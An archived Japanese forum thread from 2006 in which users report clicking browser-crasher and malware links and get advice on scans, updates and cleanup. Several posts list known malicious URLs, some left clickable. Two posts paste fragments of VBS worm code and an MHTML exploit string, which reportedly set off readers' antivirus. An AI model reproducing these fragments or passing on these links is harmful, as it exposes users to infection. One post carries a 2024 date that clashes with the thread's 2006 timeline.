またブラクラ踏んでしまいました(+x+)

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
「なんか変なのふんだ!!どうしよう!!!11」
「PC蛾物故割れたwwwww」

あやしいリンクを踏んでしまって、あわてている人のためのスレッドです


あわてていても>>2-10くらいは目を通しましょう

前スレ
ブラクラ踏んでしまいました(*_*)
http://pc8.2ch.net/test/read.cgi/sec/1014729406/

関連スレ
セキュリティ初心者質問スレッド
http://find.2ch.net/?BBS=ALL&TYPE=TITLE&STR=%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3%BD%E9%BF%B4%BC%D4%BC%C1%CC%E4%A5%B9%A5%EC%A5%C3%A5%C9&COUNT=10
2名無しさん@お腹いっぱい。:2006/11/07(火) 16:31:40
★質問時のお約束★
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事

あなたが踏んだあやしいリンクのURLは回答に必要な情報ですが
同時に凶器にも成り得ます。他の方が誤って踏まないよう注意しましょう
3名無しさん@お腹いっぱい。:2006/11/07(火) 16:32:36
★よく出るブラクラ★
www.hellplant.org/cgi-bin/xoor/serpent.cgi

メディアプレーヤーやtelnetを起動
Outlookに変なニュースグループを作成
最後にIPを抜かれる
とりあえずPCに実害は無いので踏んだら再起動でおk
4名無しさん@お腹いっぱい。:2006/11/07(火) 16:33:49
★最近よくある手口その1★

〜画像リンクに見せかけて実はブラクラ〜

例:up2.viploader.net/pic/src/viploader90786.jpg
(既に404です)

URL末尾がjpgでも油断してはいけません
こんなのはどうとでも書けます
IEは初期設定ではリンク先をファイルの内容に従って開くので
対象がhtmlなどであれば、ブラクラが炸裂する事も
5名無しさん@お腹いっぱい。:2006/11/07(火) 16:34:20
★最近よくある手口その2★

〜超巨大画像〜

例:www.lbycwi.org/images/Logos/LBYC%20Burgee-w-text-huge.jpg
(危険。踏まないで下さい)

画像は画像ですが、それが度を越すと凶器にもなります
例の画像は解像度12000×6927を誇り、あなたのPCのメモリを強烈に消耗します
低スペックPCでは固まる原因になります
また、こういった画像がアップローダーなどで再利用される場合もあります
6名無しさん@お腹いっぱい。:2006/11/07(火) 16:34:52
★最近よくある手口その3★

〜ニュースサイト見せかけて実はブラクラ〜

例:newsheadline.tripod.com/sports/20060928-00000025-san-fi.html
例:headline-news.tripod.com/national/20061028-000000112-asa-soc.html
(前スレより、現在は404)

URLは結局どうとでも書けるという事です
ブラクラ程度で済めばいいですが、中にはウイルスサイトに繋がっているなど
本当に悪質な物もあります。日頃からPCセキュリティに留意しましょう
最悪↓だけはやっておきましょう

WindowsUpdate
http://update.microsoft.com/
7名無しさん@お腹いっぱい。:2006/11/07(火) 16:37:57
あなたが悪質なリンクを踏んでしまった時に
あなたのPC環境の情報が必要になる場合があります
その場合は以下の項目を記入してください

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
8名無しさん@お腹いっぱい。:2006/11/07(火) 16:39:55
とりあえずこんな感じか
あやしい記述や不足分があれば指摘ヨロ

後は需要に任せる
9名無しさん@お腹いっぱい。:2006/11/07(火) 19:51:18
乙カレさん ^^
10名無しさん@お腹いっぱい。:2006/11/08(水) 10:58:06
スレ立て乙です

毎日、このスレを覗いてはブラクラURLをNG登録するのが日課です
11名無しさん@お腹いっぱい。:2006/11/09(木) 13:54:08
12名無しさん@関西自慰協会会長:2006/11/09(木) 14:40:36
モツ
13名無しさん@お腹いっぱい。:2006/11/09(木) 17:27:56
http://pc8.2ch.net/test/read.cgi/sec/1162956975/l50
精神的にかなり苦痛なのですが、対処法おねがいしまつ
14名無しさん@お腹いっぱい。:2006/11/09(木) 17:59:05
どれが苦痛なのかな?
15名無しさん@お腹いっぱい。:2006/11/09(木) 19:34:16
>>14
NODは確かにいいソフトで購入検討していましたが、あちらこちらに沸いたNOD厨のおかげで、
今ではNODと32という文字を見るだけで、寒気、めまい、吐き気を感じるようになってしまいました。
上記の文字を含んだスレタイはブラクラに値すると思います。
16名無しさん@お腹いっぱい。:2006/11/09(木) 19:47:15
>>15 こちらで答えが見つかるのではないかと・・・
http://life7.2ch.net/jinsei/
http://life7.2ch.net/psy/
http://life7.2ch.net/mental/
17とにかくソフトを試しまくる人:2006/11/09(木) 20:14:15
>>15
そうですか、それはお気の毒に・・・

しかしながら大多数は、なんたちゃってNOD使いによる

NOD厨を装って嫌悪感を演出する低脳テクニック

を駆使するやからばかりなので、どうか考慮してあげて下さい。

あなたのご気分が、少しでも早く回復することを願っています。
18名無しさん@お腹いっぱい。:2006/11/09(木) 20:23:21
物事は分けて考えようぜ。
NOD32という製品とその使用者は明確に分離されるべきである、と。
19名無しさん@お腹いっぱい。:2006/11/09(木) 20:29:28
精神的ブラクラ対策のためにFirefoxのコンテンツ-画像設定で
例外設定にサイトをひとつずつ載せているのですが
urlをまとめてあるサイトとかないでしょうか?
20名無しさん@お腹いっぱい。:2006/11/10(金) 19:41:40
21名無しさん@お腹いっぱい。:2006/11/10(金) 19:46:36
22名無しさん@お腹いっぱい。:2006/11/10(金) 20:00:12
>>20
>>6
有害無害含めて30種類の悪意あるサイトを呼び出すブラクラ
WindowsUpdate済みなら多分踏んで即感染は無い
一時ファイル削除して適当なウイルススキャンして何も出なければおk
23名無しさん@お腹いっぱい。:2006/11/10(金) 20:11:38
>>21-22
ありがとうございます。アップデートはしてません。
PCがぶっ壊れました。携帯からのカキコです(泣
24名無しさん@お腹いっぱい。:2006/11/10(金) 20:20:59
>>20
Java/ClassLoader.AA トロイ
JS/WindowBomb.G トロイ
Win32/TrojanDownloader.Small.NBQ トロイ
VBS/Redlof.M ウイルス
Win32/Exploit.WMF トロイ の亜種
Win32/AdInstaller
Win32/AdInstaller アプリケーションの亜種

など多数ありあり
25好奇心怖い:2006/11/10(金) 20:47:16
ttp://www.c-games.net/userstatistik.php?id=2621
を踏んでしまいました。
キーロガーだ、パス抜かれた、垢ハックされたetc・・・と言われてて不安でたまりません。
不用意に踏んだ自分に非があるのは十分承知してます。
釣りだといいのですが、もし本当だとしたらどう対処すればよいのでしょうか?
26名無しさん@お腹いっぱい。:2006/11/10(金) 20:58:36
>>25
踏んだだけではなんにも反応せん。
ただのはったりだな、それ。
27名無しさん@お腹いっぱい。:2006/11/10(金) 21:02:05
>>25
>>26と同意見。とりあえずそのURLまでなら不審な点は見当たらない
28名無しさん@お腹いっぱい。:2006/11/10(金) 21:08:42
>>25
そのURL、さらにその先も色々踏んだがなにも無し。
なんなら自分で再度踏んでみればわかる。 ^^
29名無しさん@お腹いっぱい。:2006/11/10(金) 21:11:29
>>25は何でこのスレに持ち込んだのだろう
30好奇心怖い:2006/11/10(金) 21:14:09
>>26>>27>>28
感謝します。
31名無しさん@お腹いっぱい。:2006/11/10(金) 21:31:48
>>29
そりゃ怖がりだからさ、おk?
32名無しさん@お腹いっぱい。:2006/11/10(金) 21:32:19
>>30

 ^^
33名無しさん@お腹いっぱい。:2006/11/12(日) 14:10:47
34名無しさん@お腹いっぱい。:2006/11/12(日) 16:39:15
トミヤアパレル株式会社
http://www.tomiya-ap.com/index.html

IMON ファイル http://www.tomiya-ap.com/favicon.ico Win32/Nachi.B ワーム 切断されました
35名無しさん@お腹いっぱい。:2006/11/16(木) 19:35:15
http://headline-news.tripod.com/national/20061109-00000132-mai-soc.html
踏んでしまいました・・・
初心者の自分にはいい勉強になった・・・
36エロ好きな質問者:2006/11/16(木) 19:57:36
踏んでしまいました。
どこへ行けば解決できますか。
IE6
スレイプ
ttp://strange.kir.jp/stored/qwup12751.jpg
開き続けています。
37名無しさん@お腹いっぱい。:2006/11/16(木) 19:58:43
>>35
何事も経験経験。ところでリンクを貼るときはhを抜いてね。特にやばめのリンクは。
38名無しさん@お腹いっぱい。:2006/11/16(木) 20:13:11
踏んでしまってEXPL_WMF GENというのにかかってしまったんですが
どんなウイルスなんですか?
39名無しさん@お腹いっぱい。:2006/11/16(木) 20:15:40
tp://headline-news.tripod.com/national/20061109-00000132-mai-soc.html

踏んじゃった。
以前からあるURLらしいけど、どーだろ。
とりあえずspybotとAd-AwareSEでスキャン&削除したけど
まだなんかした方がいいかな
40名無しさん@お腹いっぱい。:2006/11/16(木) 20:36:22
>>39
>とりあえずspybotとAd-AwareSEでスキャン&削除したけど

新種のウィルスやトロイが入ってたらやっかいなので
カスペルスキーのオンラインスキャンぐらいおれはやるけどな

41名無しさん@お腹いっぱい。:2006/11/16(木) 20:38:17
4238:2006/11/16(木) 20:55:00
>>41
ありがとうございました
43エロ好きな質問者:2006/11/16(木) 22:39:58
ブラクラじゃないかも知れません。
ポップアップブロック有効にしてた気がします。
「既定のメールクライアントが正しくインストールされていないため
この操作を行えませんでした。」のウィンドウが開きます。
消しても、消しても、同じウィンドウが開きます。
このタブだけ消せれたらよいのですが。
ヤバイと思ってF4押したけど、時すでに遅しでした。
今、スレイプは操作を受け付けない状態です。
44名無しさん@お腹いっぱい。:2006/11/16(木) 23:16:22
>>39
自分もこれ踏んじゃったのですけど

踏む

一時ファイル消去

インストしてるAVGでウィルススキャンするも反応なし

カスペルスキーでオンラインウィルススキャン
-----
スキャンの統計
スキャンしたオブジェクトの総数 71143
検知されたウイルス 1
感染したオブジェクト 0
疑わしいオブジェクト 6

感染オブジェクト名 ウイルス名 前回の処理
C:\Documents and Settings\***\My Documents\Jane Style\Logs\*** 疑わしい: Exploit.HTML.Mht
上記のような2chのログが6つ検出
-----

シマンテックのオンラインウィルススキャンでも
2chログの誤検出のみ

って状況でした
最後にシステムの復元をして通常利用に戻ろうと思うのですが
大丈夫でしょうか?今のところ特に以前と変わった点はありません
一応こまめにアップデートしてるのが功を奏したのかな・・・と思ってるんですが
45名無しさん@お腹いっぱい。:2006/11/16(木) 23:26:08
>>44
問題なす
46名無しさん@お腹いっぱい。:2006/11/17(金) 00:00:15
>>43
>36はDr.Web R ? onlineでExploit.WinCrashとでたよ
タスクマネージャからプニル終了させたら
47名無しさん@お腹いっぱい。:2006/11/17(金) 00:11:55
>>45
ありがとうございます
48名無しさん@お腹いっぱい。:2006/11/17(金) 00:18:02
>>47

 ^^
49名無しさん@お腹いっぱい。:2006/11/17(金) 00:57:25
OK。ブラクラくらったぜ 。

            ∧_∧
     ∧_∧  (´<_`  ) 流石だよな俺ら。
     ( ´_ゝ`) /   ⌒i  
    /   \     | |
    /    / ̄ ̄ ̄ ̄/ |
  __(__ニつ/  FMV  / .| .|____
      \/       / (u ⊃ 
        ̄ ̄ ̄ ̄ ̄
   ガタガタガタタタタタ・・・・
50エロ好きな質問者:2006/11/17(金) 03:31:21
>>46
ありがとうございました。
プラウザはあきらめるしかないのでしょうか。
51名無しさん@お腹いっぱい。:2006/11/17(金) 03:45:32
>>50
>プラウザはあきらめるしかないのでしょうか。

意味がよくわかんない。
5239:2006/11/17(金) 08:33:44
補足。一応バスター2007入ってます。
でも心配でspybotとAd-AwareSEでスキャン、更にセーフモードでもう一回Ad-AwareSE。
オススメのカペルスキーオンラインスキャンをやったら以下の結果

C:\Program Files\Live2ch\log\life7.2ch. (中略).dat 疑わしい:
C:\Program Files\Live2ch\log\music5.2ch. .dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch. 5.dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch.net dat 疑わしい:

C:\Program Files\Trend Micro\Virus Buster 2007\Quarantine\75D.tmp 疑わしい:
C:\Program Files\Trend Micro\Virus Buster 2007\Quarantine\Backup\meroharudoumei[1].RB0 感染: Virus.VBS.Redlof.a

バスターが感染ってどういうコト?
誤検出でイイのかな?
改めてバスターでスキャンしたらAd−Awareが誤検出されたし。
53名無しさん@お腹いっぱい。:2006/11/17(金) 09:10:31
C:\Program Files\Live2ch\log\life7.2ch. (中略).dat 疑わしい:
C:\Program Files\Live2ch\log\music5.2ch. .dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch. 5.dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch.net dat 疑わしい:

たぶん2chに書き込まれたコードだろうけど、疑わしいと判定されてるなら
削除すればいいでしょ。 所詮2chのログだし。

バスターはわからん。 
54名無しさん@お腹いっぱい。:2006/11/17(金) 10:04:16
>>52
Quarantine = 隔離
バスターが隔離したウイルスにカスペが反応しているだけ
既にバスターが無害化したファイルだからそのままで問題無い
それでも気持ち悪いと思うなら隔離逝きになったファイルを削除してしまえばいい
5539:2006/11/17(金) 10:30:52
>53 >54
ありがとうございました。
2chのログは削除済みです。
バスターはそのままで良いのですね、安心しました。
56名無しさん@お腹いっぱい。:2006/11/18(土) 17:14:29
tp://www5d.biglobe.ne.jp/~EMPEROR/hamaayu.mpeg

ここなんですが、踏んだらWinメディアプレイヤーが不正終了しました
何か問題があるURLか分かる方いませんか?
57名無しさん@お腹いっぱい。:2006/11/18(土) 17:47:31
ttp://www.mayhem.net/juke/bodiesbeat1.html
これ踏んじゃいました。ブラクラらしいのですが、なにも起こりません。
急に再発したりするんですかね?
58名無しさん@お腹いっぱい。:2006/11/18(土) 17:56:33
>>56
「video/mpeg」を発見しました。(4.3 MB) SCOでは問題ないようです。
右クリックしてダウンロード再生してみては?
59名無しさん@お腹いっぱい。:2006/11/18(土) 18:02:48
>>56
普通にみれたぜ。
浜崎のコンサートの一部だった。
60名無しさん@お腹いっぱい。:2006/11/18(土) 18:04:34
>>57
ブラクラではありません。
ただ動画自体が揺れるのでくらくらします。
61名無しさん@お腹いっぱい。:2006/11/18(土) 18:08:18
>>58-59
そうでしたか!ありがとうございます。
いま心配でMcafee走らせましたが、感染なしでした。
62名無しさん@お腹いっぱい。:2006/11/18(土) 18:17:24
>>58
右クリックでダウンロードして観たら、ちゃんとみれました。
お騒がせいたしました。
6359:2006/11/18(土) 18:20:16
>>61
Mcafeeで発見できないトロイなどがあるので
やばいと思ったらカスペルスキーのオンラインスキャンあたりで確認する方がいいよ。^^

by 元Mcafee使ってた人

p.s.
上のURLは問題ないので安心してほしい。^^
64名無しさん@お腹いっぱい。:2006/11/18(土) 18:21:08
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"

c.Copy(dirwin&"\Win32DLL.vbs  <body onload=window()>   c.Copy(dirsystem&"\MSKernel32.vbs

ms-its:mhtml:file://C:\
65名無しさん@お腹いっぱい。:2006/11/18(土) 18:21:43
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!
6656:2006/11/18(土) 18:25:27
>>63
ご丁寧にありがとうございます。
重ねてお礼いたします。
67名無しさん@お腹いっぱい。:2006/11/18(土) 18:26:39
>>66

 ^^
68名無しさん@お腹いっぱい。:2006/11/20(月) 16:09:25
tp://jp.drivecleaner.com/.freeware/index.php?ad=swp_dc_ed2&link=2819&aff=pp_2396577532&a=0&p=14&ex=1&hv=&ap=0&w=0&j=0

日本向けに作られたサイトみたいです。
一種のブラクラと思いますが、鑑定お願いします。
69名無しさん@お腹いっぱい。:2006/11/20(月) 16:15:04
>>68
インチキソフトサイト
騙されてダウンロード・実行しなければ特段害は無い

関連スレ
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor
http://pc8.2ch.net/test/read.cgi/sec/1162464139/
7068です:2006/11/20(月) 17:58:39
>>69
ありがとうございます。

YouTubeの動画観てたら、いきなり「Drivecleaner」に飛ばされました。
表記の日本語がおかしく、閉じてもまた出てくるのでタスクで強制終了いたしました。
勉強不足でした<(_ _)>

失礼ですが、こちらのスレッド開くたびにノートン先生反応するのですが、自分だけ!?
なにやら 「HTTP MSIE JavaScript OnLoad Rte CodeExec」 の試みを検出して遮断しました とか、
Bloodhound.Exploit.6 (ウィルス)を検出、修復しましたって???


71名無しさん@お腹いっぱい。:2006/11/20(月) 18:14:56
>>70
ノートンがウィルスコードに反応してるだけだよ。
それがノートンの弱点なのだよ、これが。
いい加減改良しろよスマンテック社。
72名無しさん@お腹いっぱい。:2006/11/21(火) 03:35:37
ttp://headline-news.tripod.com/

踏んでしまいました。
Macでも何か問題が起こることはありますか?
73名無しさん@お腹いっぱい。:2006/11/21(火) 04:26:22
>>72
tripod.com自体は単なるウェブホストサイトなのでそこまでなら無害
>>6のようにそれ以降の文字列が問題になる

ただ、今、tripod.comを踏むと>>69にある詐欺ソフトを薦められる場合がある
これを騙されて実行すると有害。macで動くかどうか分からんが

特に何も出なかったよ、というならそれも問題無し
74名無しさん@お腹いっぱい。:2006/11/21(火) 05:35:51
>>72
macなら平気でしょたぶん。
心配ならばmac用のフリーソフトでチェックすればおkだと思うよ。
7572:2006/11/23(木) 03:35:13
ありがとうございました。
安心しました。
76ひみつの検疫さん:2024/11/08(金) 23:11:04 ID:MarkedRes
汚染を除去しました。
77名無しさん@お腹いっぱい。:2006/11/23(木) 05:08:49
これが噂のノートントラップを引き起こすウィルスコードです・・・

釣られますた;
78名無しさん@お腹いっぱい。:2006/11/26(日) 10:41:19
79名無しさん@お腹いっぱい。:2006/11/26(日) 13:47:52
ttp://www1.harenet.ne.jp/~m-toyota/kiken/bc/sugoi.htm

これURLからしてブラクラだと思うんですが、どうなんでしょうか?
80名無しさん@お腹いっぱい。:2006/11/26(日) 14:20:51
>>79
ブラ・・・・すれ違いです。本当にありがとうございry
81125x101x126x234.ap125.ftth.ucom.ne.jp:2006/12/01(金) 10:16:05
あげ
82名無しさん@お腹いっぱい。:2006/12/04(月) 00:46:02
ttp://www.geocities.com/fuzoku_ou/index.htm

踏んだらウインドウがたくさん出てきてしまいました><
83名無しさん@お腹いっぱい。:2006/12/04(月) 11:25:03
>>82
そこトロイも仕込まれるお
84名無しさん@お腹いっぱい。:2006/12/04(月) 11:28:17
>>82
テルネットストームだね
85名無しさん@お腹いっぱい。:2006/12/05(火) 03:08:09
かつてのソースチェッカーオンラインってサイト

ttp://7walker.com/so/

へアクセスしようとすると、ムハンマドとかHackedとか書かれた怪しいサイト

http://www.wolfsecurity.org/portal/muhammed/

へ飛ばされるようになったんですがここはヤヴァイサイトでしょうか・・
86名無しさん@お腹いっぱい。:2006/12/05(火) 06:12:10
>>85
よくわからんがハッカー連中のホームページかな
とりあえず踏んで即何かを仕掛けられるというのは無いみたいだが
手口も思想的にもヤヴァイ連中かも知れん

奥に進むとブルートフォースとか置いてあるし
まぁ関わり合いにならん方がいいだろう
87名無しさん@お腹いっぱい。:2006/12/05(火) 12:21:57
88名無しさん@お腹いっぱい。:2006/12/05(火) 12:40:36
>>87
ソースチェックサービスは利用可能だけど
普段ページ中心に据えられている更新履歴がごっそり無くなっている

やっぱ何かあったのかね
89名無しさん@お腹いっぱい。:2006/12/05(火) 12:47:31
やられたっぽい
//www.7walker.com/のTOP


hacked by cobra_21
90名無しさん@お腹いっぱい。:2006/12/05(火) 13:12:17
トップページが書き換えられてしまっている
ttp://so.7walker.net/
91名無しさん@お腹いっぱい。:2006/12/05(火) 13:23:39
どういうことなの?
92名無しさん@お腹いっぱい。:2006/12/05(火) 13:27:20
Site Hacked by lord Chy








白・・・
93名無しさん@お腹いっぱい。:2006/12/05(火) 15:09:48
>>90
そいつ、画像はやつらのサイトから取ってきてるから踏むとアクセスログ取られるかもよ。
94名無しさん@お腹いっぱい。:2006/12/05(火) 17:07:56
他スレからモテキタ(^o^)

186 名前:猫△ワル男 ◆oKLssLV2YM [sage] 投稿日:2006/12/05(火) 16:45:04 ID:???
トップを食われちゃってますね 無差別攻撃かな
まあお忙しいとかおっしゃってましたので(公開コメントで)こんなこともあるんでしょう

全破壊を受けたわけではないようです 復旧まで、迂回路(?)を使いましょう
ただし、どんな地雷を埋められているかわからないので、
サイトの再インストール完了宣言までは、安全判定不可扱いです
ttp://so.7walker.net/index.php
ttp://so.7walker.net/board/
95名無しさん@お腹いっぱい。:2006/12/05(火) 19:47:10
クラッキング(ハッキング)されました。。。

どうやら
7walker.com
7walker.net
どちらのサイト共にやられたようです。

階層内もずたずたにされており、
危険なファイルがまぎれている場合があるので、
サイト内にアクセスする場合は気をつけてください。

あとソースチェッカーオンラインですが、
誠に勝手ながら休憩させていただきます。
なお復帰時期は未定です。


あらら。。。
96名無しさん@お腹いっぱい。:2006/12/05(火) 19:49:27
さっき普通にチェックしたあともう一度チェックしたらその表示が出てきてワロタ
9785:2006/12/05(火) 21:11:39
みなさんレスありがとうございました。 こーゆー事だったんですね。
Janeとかのコマンドに指定していつも確認してから観てたんですけど
自分ひとり変なページに飛ばされてたんで実況とかついていけなかっ
た...orz
98名無しさん@お腹いっぱい。:2006/12/05(火) 23:25:52
ブラクラで検索かけてこのスレ来ました。
ソースチェッカーオンラインをいつも利用していたのですが
なんか攻撃されたとかで>>94-95ですね
復帰時期が未定とのことなので代わりになるサイトを探しています
どこかおすすめのところはありますか?
専ブラから飛んでいけるサイトを探しています
(専ブラを利用しているので専ブラで知りたいサイトのURLをクリックして飛んでいく)
99名無しさん@お腹いっぱい。:2006/12/06(水) 00:52:55
>>98
ttp://www.kakiko.com/check/sample.html
これはどうかな?
100名無しさん@お腹いっぱい。:2006/12/06(水) 00:53:46
とりあえずview-source:かね。 SP2は同等品とかで
101名無しさん@お腹いっぱい。:2006/12/06(水) 06:43:11
102名無しさん@お腹いっぱい。:2006/12/07(木) 23:38:19
"Hacked by" "Site hacked"でググルと哀れなサイトが結構出てきてウケル。
103名無しさん@お腹いっぱい。:2006/12/07(木) 23:39:09
おっと、ヒットしても踏むときは自己責任でなw
104名無しさん@お腹いっぱい。:2006/12/08(金) 15:54:01
ki143.opt2.point.ne.jp
222.225.95.143

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.225.0.0/16
b. [ネットワーク名] TEPCO-HIKARI
f. [組織名] 株式会社ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET,Inc.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MH4804JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2005/07/22
[最終更新] 2006/08/31 11:44:09(JST)

上位情報
----------
KDDI 株式会社 (KDDI Corporation)
[割り振り] 222.225.0.0/16
105名無しさん@お腹いっぱい。:2006/12/09(土) 23:38:21
106名無しさん@お腹いっぱい。:2006/12/14(木) 09:22:09
先日他所で>>3のブラクラを踏んでしまいました。
接続はすぐに切ったんですが、自分なりに調べてみたらADSL以外の環境では
国際電話やQ2に繋がってしまうと書いてありました。
自分はカード型PHSで接続しているので、料金がかかる可能性が高いんでしょうか?
>>3には実害は無いと書いてありますが、どうなんでしょう?
自分の責任なのはわかっていますが、良かったら教えてください。
107名無しさん@お腹いっぱい。:2006/12/14(木) 19:50:17
ダイアルのプロパティをみて番号が正規のプロバイダになっているか確認せよ

108名無しさん@お腹いっぱい。:2006/12/15(金) 05:57:32
>>107
レスありがとうございます
カード型PHSのダイヤル先を確認してみたんですが、元のプロバイダの電話番号でした。
この場合、今現在は大丈夫と考えてよいのでしょうか?
また、ブラクラを踏んだ時点で課金されている可能性はありますよね?
109名無しさん@お腹いっぱい。:2006/12/15(金) 10:41:34
PHS以外の接続設定が出来てたら繋がった可能性はある。

>カード型PHSで接続しているので
willcomなら注意事項を読んでこれ申し込んどけ
ttp://www.willcom-inc.com/ja/service/packet_only/index.html

>また、ブラクラを踏んだ時点で課金されている可能性はありますよね?
質問の意味がわからない
110名無しさん@お腹いっぱい。:2006/12/15(金) 23:51:05
>>82
これを踏んでVB2007が反応し窓がたくさんでてきてやばいと思ったので
再起動
LANケーブルをはずしウィルスチェックかけるとウィルスが検出され
隔離されたとの報告
気持ち悪いのでバックアップソフト(HDD革命)でシステムドライブを
一週間前の状態に戻した
他のドライブに影響出てないといいが
というか初めてウィルス踏んだ・・orz
111名無しさん@お腹いっぱい。:2006/12/16(土) 00:08:49
>>110
今はバスター使ってないからわからんが
検出されたのはこれじゃないのか
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_NOCLOSE.AE

ブラクラを起こすスクリプトを便宜上ウイルス扱いしているだけで
システム破壊や感染活動は行わない
踏んだ時に一回発動してそれっきりのはず
>ウィルスチェックかけるとウィルスが検出され
一時ファイルに該当のjsが残っていたのだと思うけど

対処法としては放置か、気になるなら一時ファイル削除して再起動すれば十分
わざわざ復元措置をするほどの、大層な代物では無い

別にまぁ、気持ち悪いから戻す、というのも精神衛生の面で十分な理由ではあると思うけどね
112名無しさん@お腹いっぱい。:2006/12/16(土) 00:13:37
>>111
そのウィルスです
あまり危険じゃないのですね安心しました
113名無しさん@お腹いっぱい。:2006/12/16(土) 02:49:43
ttp://headline-news.tripod.com/national/20061118-00000102-mai-soc.html
これ踏んでやられました。
対処法を教えてください。
IEが開きません
114名無しさん@お腹いっぱい。:2006/12/16(土) 03:15:08
115名無しさん@お腹いっぱい。:2006/12/16(土) 03:25:53
【使用OS】
windows xp
【WindowsUpdateしてるか】
最近していない
【AntiVirusは何を使っているか】
ノートン
【ちゃんとUpdateしてるか】
していない
【スキャンした結果(ウイルス名・発見場所)
2ちゃん内
【別のオンラインスキャンしたならその結果は】
ウイルスを発見、削除できません。
【症状を具体的に、分かる限りすべて書く】
IEが開かない。エラーとでる
【何をしたらそんなことになったのか】
2チャン内のURLふみました
【これまでにとった措置】
テンポラリー内削除
【その他の質問】
PC買い替えになるのでしょうか?
116名無しさん@お腹いっぱい。:2006/12/16(土) 14:04:08
>>109
ありがとうございます。
それは便利ですね。すぐにでも登録します。
下部の文は、あのブラクラを踏んでから接続を切るまでの間に
Q2に繋がれていた可能性はあるかって事です。
日本語ヘタですみません。
117名無しさん@お腹いっぱい。:2006/12/16(土) 18:35:37
>>115
ウイルス名は?
118名無しさん@お腹いっぱい。:2006/12/17(日) 02:39:54
>>116
109ではないが。Q2やらに接続されていた可能性はないとはいえないが、低い。
気になるのなら電話会社で通話明細を確認してみた方がいいと思う。
Q2はNTTのサービスなのでNTT以外の会社からつながったのかな?試しにどこかのQ2にかけてみれば?
119名無しさん@お腹いっぱい。:2006/12/17(日) 02:44:52
>>115
PCのダメージ少ないなら、ウイルス駆除→IE再インスコで治るかも。だめだったらOSを再インスコまたはシステムリカバリーディスクを使用。
買い換える必要はないだろ。
120名無しさん@お腹いっぱい。:2006/12/17(日) 13:27:42
ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi

これ踏んじゃったんだけど、これ貼った奴訴えても良い?
121名無しさん@お腹いっぱい。:2006/12/17(日) 13:30:46
>>120
くだらねえ。
やめとけ。
mmsとか使ってプロクシを回避、IPアドレスを抜くやつだ。
ブラクラでも何でもねえ。
122名無しさん@お腹いっぱい。:2006/12/17(日) 13:38:07
>>121
ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi
のアドレスをクリックすることで、ブラウザクラッシャーという悪質ないたずらが発生する。
無制限にさまざまなプログラムが起動し、CPUやメモリの許容範囲を超えるような作動をし、
フリーズし、強大な負荷により、ハードディスクが破損する恐れもあるという。
そして、最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
プロバイダに確認したところ、CATVやADSLや光ファイバーではtelnetによって回線を勝手に変えられることはないようだが、不確定なので注意すべきだ。
この掲示板でも、なんどもこのアドレスを偽装して踏ませようとする悪質な罠を作成する陰湿な者がいるので注意してほしい。


って書いてあるんだけど、じゃあ害は無いの?
123名無しさん@お腹いっぱい。:2006/12/17(日) 13:43:00
本質はブラクラじゃねえよ。
ブラクラっぽい動作をするだけだ。
本質はIPアドレスの表示。
124名無しさん@お腹いっぱい。:2006/12/17(日) 13:54:32
>>123
じゃあ対策は要らないんですか?
125名無しさん@お腹いっぱい。:2006/12/17(日) 14:29:30
俺も別の板のスレで>>120踏んでしまった。
ノートンがブロックしてくれたような気がするけど、ヤバいかな。
とりあえずスパイウェアチェックとウイルスチェックしてこよう
126名無しさん@お腹いっぱい。:2006/12/17(日) 14:36:47
>>122
>最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。

Telnetクライアントでググってみろ
ダイヤルアップなんかと全然関係ねえよw
127名無しさん@お腹いっぱい。:2006/12/17(日) 14:42:57
 一例としてWindows98からUNIXのサーバーを利用する場合を示すと、上記で起動したTelnetクライアントの「接続」メニューの
「リモートシステム」を選択し、「ホスト名」に相手のサーバーのIPアドレスかホスト名を入力するとサーバーに接続され、
「login」名と「Password」の入力が求められるので、正しく入力すると使用できるようになる。
128名無しさん@お腹いっぱい。:2006/12/17(日) 14:50:17
俺なんてその手のブラクラ10000回は踏んでるなw
tskill iexploreでいつも強制終了させてるわさww
129名無しさん@お腹いっぱい。:2006/12/17(日) 14:51:33
訴えるも何も自分が危険URLをここに貼ってるじゃん
130名無しさん@お腹いっぱい。:2006/12/17(日) 14:52:14
url
IPが抜けませんでしたっ
www.hellplant.org/cgi-bin/xoor/serpent.cgi - 2006年12月16日 - このサイト内で検索
131名無しさん@お腹いっぱい。:2006/12/17(日) 15:00:01
そもそもが一般人にTelnet.exeなんて必要ねえじゃねえかよ
ファイアーウォールで外向けをブロックしちまえよw
それと、それらの相手先のTelnetサーバーは応答なんてして来ねえよ
132名無しさん@お腹いっぱい。:2006/12/17(日) 15:16:13
>>119
ウイルス駆除ってww
その方法を記載しろよ・・・
133名無しさん@お腹いっぱい。:2006/12/17(日) 15:30:20
感染したって言ってるウィルス名も分からないのにどうアドバイスしろと・・・
134名無しさん@お腹いっぱい。:2006/12/17(日) 15:31:03
>>133
つクリーンインスコ
135名無しさん@お腹いっぱい。:2006/12/17(日) 16:39:41
>>118
さすがに自爆はできないですw
